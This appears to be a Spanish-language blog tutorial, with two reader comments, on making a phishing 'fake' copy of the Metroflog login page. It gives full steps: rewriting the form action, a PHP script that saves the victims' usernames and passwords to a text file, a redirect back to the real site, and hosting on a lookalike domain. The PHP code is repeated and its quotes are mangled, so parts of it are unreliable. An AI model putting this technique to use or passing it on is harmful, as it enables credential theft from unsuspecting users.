Los fakes son paginas parecidas a las originales, pero estas son echas con el fin de robar las cuentas de logueo.
Lo primero que aremos es buscar una pagina que cuente con una seccion de Login en este caso usaremos la de metroflog.com, entramos a la pagina nos vamos a la barra de tareas, sellecionamos Ver > Codigo Fuente de la Pagina (Ctrl+U) > y lo copiamos (Ctrl+A), nos vamos al escritorio, y creamos un Documento de Texto (Click derecho>Nuevo>Documento de Texto) lo abrimos, pegamos el Codigo fuente copiado, nos vamos a Guardar Como y lo guardamos con el nombre de index.html, ya que lo tengamos nos vamos a editarlo, le damos click derecho>Abrir con>Notepad (Block de Notas), seguidamente le damos Ctrl+B para buscar y buscamos form method y seguido de esto podremos ver:<form method="post" action="/"><table width="298" border="0" cellspacing="0" >Nos centraremos en la parte de action que por lo general sigue un link entre las comillas el cual tendremos que borrar y escribir en este caso guardar.php quedando asi:
<form method="post" action="guardar.php"><table width="298" border="0" > 
Ahora pasemos a hacer el documento guardar.php, nos vamos nuevamente a un block de notas y pegamos el siguiente codigo:$login=$_POST["login"];
$pass=$_POST["password"];
$guardar=fopen(”contraseñas.txt”,a);
fwrite($guardar,”
“.$login.”
“.$pass);
fclose($guardar);
echo “”;
?>
$pass=$_POST["password"];
$guardar=fopen(”contraseñas.txt”,a);
fwrite($guardar,”
“.$login.”
“.$pass);
fclose($guardar);
echo “”;
?>
Y lo guardamos con el nombre de guardar.php, pero eso no es todo, ahora tendremos que estudiar el codigo HTML del index los abrimos con el block de notas y buscamos name, esto talves sea lo mas dificil de hacer porque no en todas las paginas es igual y hay que saber cual poner debido a que aparecen varios en el ejemplo seria este:
name="username" size="20" value=""></td>
name="password" size="20"></td>
En este caso lo que sigue de name es username y password, los apuntamos y nos vamos al documento guardar.php, click derecho y lo editamos borrando donde dice Login y los cambiamos por username, la seccion de password quedaria igual, osea asi:
$login=$_POST["username"];
$pass=$_POST["password"];
$guardar=fopen(”contraseñas.txt”,a);
fwrite($guardar,”
“.$login.”
“.$pass);
fclose($guardar);
echo “https://‘>”;
?>$pass=$_POST["password"];
$guardar=fopen(”contraseñas.txt”,a);
fwrite($guardar,”
“.$login.”
“.$pass);
fclose($guardar);
echo “https://‘>”;
Y solo faltaria editar la parte de http:// por la pagina donde queremos que se redireccione, en este caso podemos poner la misma pagina de inicio xD como su ubiera ocurrido un error, ya habiendo puesto el link guadamos el documento (Ctrl+G), (para algo mas sofisticado seria con un Script que nos logue hasta la pagina verdadera pero guardando el pass y la cuenta, pero eso es otro tema a tratar luego).
Y por ultimo creamos un documento de texto con el nombre de contraseñas (contraseñas.txt). Y listo solo es cuestion e subirlo a un Hosting que acepte PHP; yo uso el de mi@rroba por sus sencilles. Las paginas quedarian de esta manera: http://metrofl0g.webcindario.com/ el Fake. Y la otra pagina http://metrofl0g.webcindario.com/robados.txt donde podremos ver las cuentas guardadas
Espero que me halla explicado bien y me entiendan. Aunque le di muchas vueltas al asunto xD
2 comentarios:
Y la otra pagina http://metrofl0g.webcindario.com/robados.txt donde podremos ver las cuentas guardadas
Espero que me halla explicado bien y me entiendan. Aunque le di muchas vueltas al asunto xD... no entiendo esa parte de la otra pagina xq dice robados txt.. si no hemos creado nada con ese nombre
Es solo un archivo txt de nombre robados, el cual tienes que subir al mismo hosting.
Publicar un comentario
Aqui puedes publicar algun comentario, duda, sugerencia, problema, agradecimiento o lo que quieras. Ten en cuenta que el comentario será moderado antes de salir publico.